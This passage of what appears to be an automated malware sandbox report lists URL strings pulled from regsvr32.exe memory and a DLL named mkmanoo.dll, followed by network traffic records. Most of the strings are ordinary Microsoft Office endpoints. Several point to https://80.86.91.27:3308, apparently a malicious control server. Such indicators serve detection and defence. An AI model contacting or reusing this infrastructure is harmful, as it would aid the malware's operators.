Source: regsvr32.exe, 00000012.00000003.894507082.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308//
Source: regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308//x
Source: regsvr32.exe, 00000012.00000003.974657502.00000000031A4000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/0
Source: regsvr32.exe, 00000012.00000003.890960750.00000000031AC000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/220.64.37
Source: regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/3
Source: regsvr32.exe, 00000012.00000003.941475415.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/8
Source: regsvr32.exe, 00000012.00000003.894507082.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/99f5f57b9aM
Source: regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/D
Source: regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/H
Source: regsvr32.exe, 00000012.00000003.974657502.00000000031A4000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/P
Source: regsvr32.exe, 00000012.00000003.958125909.00000000031AD000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.903292509.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/anced
Source: regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.898757958.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/crosoft
Source: regsvr32.exe, 00000012.00000003.914533725.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/h
Source: regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/h1
Source: regsvr32.exe, 00000012.00000003.978555876.00000000031A4000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/p
Source: regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/r
Source: regsvr32.exe, 00000012.00000003.906838132.00000000031A8000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/rX
Source: regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/raphy
Source: regsvr32.exe, 00000012.00000003.980149370.000000000319B000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/rh
Source: regsvr32.exe, 00000012.00000003.925027011.00000000031AE000.00000004.00000001.sdmp	String found in binary or memory: https://80.86.91.27:3308/x
Source: regsvr32.exe, 00000010.00000003.888569929.0000000000866000.00000004.00000001.sdmp, regsvr32.exe, 00000012.00000003.941475415.00000000031AD000.00000004.00000001.sdmp	String found in binary or memory: https://80100.228.233:3389/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.office.net
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://augloop.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: mkmanoo.dll.0.dr	String found in binary or memory: https://bulksms.interweblimited.com
Source: mkmanoo.dll.0.dr	String found in binary or memory: https://bulksms.interweblimited.com/svg/404.svg);
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://cdn.entity.
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://cortana.ai
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://cr.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://directory.services.
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: mkmanoo.dll.0.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://graph.windows.net
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://login.windows.local
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://management.azure.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://management.azure.com/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://tasks.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: regsvr32.exe, 00000010.00000003.888660438.0000000000845000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.
Source: 6EC7F2B2-66F2-402E-AC2F-EE48EA399479.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
